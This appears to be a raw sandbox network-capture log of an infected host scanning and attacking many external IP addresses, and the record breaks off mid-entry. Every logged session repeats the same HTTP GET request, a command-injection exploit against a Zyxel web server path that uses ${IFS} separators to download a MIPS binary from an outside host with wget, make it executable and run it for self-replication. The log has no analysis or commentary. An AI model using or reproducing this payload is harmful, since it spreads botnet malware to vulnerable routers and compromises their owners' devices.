                                              Jan 29, 2024 07:03:48.982481003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4103192.168.2.143518038.37.148.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982506990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4104192.168.2.145285259.220.238.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982578993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4105192.168.2.1443934165.194.237.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982601881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4106192.168.2.1433836126.11.42.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982660055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4107192.168.2.146084451.208.3.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982700109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4108192.168.2.1443018133.246.42.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982713938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4109192.168.2.144742841.159.60.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982753038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4110192.168.2.1441974152.60.199.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982803106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4111192.168.2.1451416217.50.29.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982841969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4112192.168.2.1436610100.236.64.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982911110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4113192.168.2.1459960126.82.34.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982940912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4114192.168.2.1448510202.0.51.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.982986927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4115192.168.2.144614814.0.46.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983026981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4116192.168.2.145682232.33.81.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983056068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4117192.168.2.1460360162.192.174.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983100891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4118192.168.2.1447134143.21.123.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983122110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4119192.168.2.1439896187.125.138.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983194113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4120192.168.2.1457604119.201.84.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983218908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4121192.168.2.1435458108.46.201.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983256102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4122192.168.2.1447204128.249.180.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983306885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4123192.168.2.144119480.254.238.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983352900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4124192.168.2.1444188136.155.229.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983385086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4125192.168.2.144859245.248.102.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983433962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4126192.168.2.143909065.237.247.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983449936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4127192.168.2.1449098102.198.195.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983508110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4128192.168.2.144029682.44.92.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983535051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4129192.168.2.1439470169.202.236.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983573914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4130192.168.2.1442036173.226.207.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983602047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4131192.168.2.144232290.1.33.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983643055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4132192.168.2.144906654.96.24.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983695030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4133192.168.2.145791665.34.83.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983762026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4134192.168.2.1440988135.187.190.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983802080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4135192.168.2.1460940110.107.12.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983849049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4136192.168.2.1458132213.85.169.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983897924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4137192.168.2.1435600218.2.113.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983936071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4138192.168.2.143888612.20.113.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.983978033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4139192.168.2.144586248.251.179.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984014988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4140192.168.2.1433206181.76.78.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984057903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4141192.168.2.1457476207.49.33.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984078884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4142192.168.2.146059095.197.100.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984122038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4143192.168.2.144746659.247.177.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984172106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4144192.168.2.1447570208.178.155.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984216928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4145192.168.2.1437826195.89.186.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984246969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4146192.168.2.1455354143.26.207.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984285116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4147192.168.2.1448224212.192.178.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984325886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4148192.168.2.1445324154.43.226.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984360933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4149192.168.2.1449946183.17.102.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984401941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4150192.168.2.1456260147.236.14.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984426022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4151192.168.2.144034248.163.2.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984463930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4152192.168.2.1450106142.241.206.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984497070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4153192.168.2.145872291.12.100.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984527111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4154192.168.2.1460822187.203.121.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984550953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4155192.168.2.1439648216.96.231.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984597921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4156192.168.2.1440248159.37.129.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984642982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4157192.168.2.144498887.200.167.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984694004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4158192.168.2.144719413.210.86.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984723091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4159192.168.2.1438918122.224.104.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984770060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4160192.168.2.1458562173.155.73.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984795094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4161192.168.2.1450274105.194.65.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984841108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4162192.168.2.144390473.61.101.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984870911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4163192.168.2.143891017.182.144.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984920025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4164192.168.2.1444354218.198.22.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984947920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4165192.168.2.1434440213.215.18.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:48.984987974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4166192.168.2.1450616137.53.128.253443
                                              TimestampBytes transferredDirectionData
